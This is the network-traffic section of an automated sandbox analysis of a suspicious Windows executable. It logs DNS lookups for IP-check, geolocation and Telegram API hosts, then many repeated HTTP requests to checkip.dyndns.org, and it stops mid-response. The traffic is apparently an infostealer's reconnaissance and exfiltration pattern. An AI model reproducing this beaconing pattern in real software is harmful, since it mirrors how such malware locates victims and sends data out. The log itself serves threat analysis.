                                                                                                          Jan 10, 2025 22:14:18.036047935 CET1.1.1.1192.168.2.70x8e62No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 22:14:19.733231068 CET1.1.1.1192.168.2.70x8b50No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 22:14:19.733231068 CET1.1.1.1192.168.2.70x8b50No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 22:14:19.733231068 CET1.1.1.1192.168.2.70x8b50No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 22:14:19.733231068 CET1.1.1.1192.168.2.70x8b50No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 22:14:19.733231068 CET1.1.1.1192.168.2.70x8b50No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 22:14:19.733231068 CET1.1.1.1192.168.2.70x8b50No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 22:14:19.733231068 CET1.1.1.1192.168.2.70x8b50No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 22:14:26.257013083 CET1.1.1.1192.168.2.70x86c3No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                          • drive.google.com
                                                                                                          • drive.usercontent.google.com
                                                                                                          • reallyfreegeoip.org
                                                                                                          • api.telegram.org
                                                                                                          • checkip.dyndns.org
                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.749972132.226.8.169804136C:\Users\user\Desktop\V7OHj6ISEo.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 22:14:18.045551062 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 22:14:19.132848024 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 21:14:19 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                          Jan 10, 2025 22:14:19.142781973 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Jan 10, 2025 22:14:19.438960075 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 21:14:19 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                          Jan 10, 2025 22:14:25.953408003 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Jan 10, 2025 22:14:26.246644974 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 21:14:26 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.749975132.226.8.169804136C:\Users\user\Desktop\V7OHj6ISEo.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 22:14:27.486536026 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Jan 10, 2025 22:14:28.979832888 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 21:14:28 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          2192.168.2.749977132.226.8.169804136C:\Users\user\Desktop\V7OHj6ISEo.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 22:14:29.978892088 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 22:14:30.886034012 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 21:14:30 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          3192.168.2.749979132.226.8.169804136C:\Users\user\Desktop\V7OHj6ISEo.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 22:14:32.015575886 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 22:14:32.872109890 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 21:14:32 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          4192.168.2.749981132.226.8.169804136C:\Users\user\Desktop\V7OHj6ISEo.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 22:14:34.020164013 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 22:14:34.988560915 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 21:14:34 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          5192.168.2.749983132.226.8.169804136C:\Users\user\Desktop\V7OHj6ISEo.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 22:14:36.013865948 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 22:14:36.889926910 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 21:14:36 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          6192.168.2.749985132.226.8.169804136C:\Users\user\Desktop\V7OHj6ISEo.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 22:14:37.933798075 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 22:14:39.060758114 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 21:14:38 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          7192.168.2.749987132.226.8.169804136C:\Users\user\Desktop\V7OHj6ISEo.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 22:14:40.039592981 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 22:14:40.847826958 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 21:14:40 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          8192.168.2.749989132.226.8.169804136C:\Users\user\Desktop\V7OHj6ISEo.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 22:14:41.747735977 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 22:14:42.572724104 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 21:14:42 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          9192.168.2.749991132.226.8.169804136C:\Users\user\Desktop\V7OHj6ISEo.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 22:14:43.522624016 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 22:14:44.362341881 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 21:14:44 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          10192.168.2.749993132.226.8.169804136C:\Users\user\Desktop\V7OHj6ISEo.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 22:14:45.297108889 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 22:14:46.148102999 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 21:14:46 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          11192.168.2.749995132.226.8.169804136C:\Users\user\Desktop\V7OHj6ISEo.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 22:14:47.268685102 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 22:14:48.297692060 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 21:14:48 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          12192.168.2.749997132.226.8.169804136C:\Users\user\Desktop\V7OHj6ISEo.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 22:14:49.280750036 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 22:14:50.103286982 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 21:14:49 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          13192.168.2.749999132.226.8.169804136C:\Users\user\Desktop\V7OHj6ISEo.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 22:14:51.064979076 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 22:14:52.240042925 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 21:14:52 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          14192.168.2.750001132.226.8.169804136C:\Users\user\Desktop\V7OHj6ISEo.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 22:14:53.641976118 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 22:14:54.498096943 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 21:14:54 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          15192.168.2.750003132.226.8.169804136C:\Users\user\Desktop\V7OHj6ISEo.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 22:14:55.533571005 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 22:14:56.362341881 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 21:14:56 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          16192.168.2.750005132.226.8.169804136C:\Users\user\Desktop\V7OHj6ISEo.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 22:14:57.389036894 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 22:14:58.223989964 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 21:14:58 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          17192.168.2.750007132.226.8.169804136C:\Users\user\Desktop\V7OHj6ISEo.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 22:14:59.161710978 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 22:15:00.047101974 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 21:14:59 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
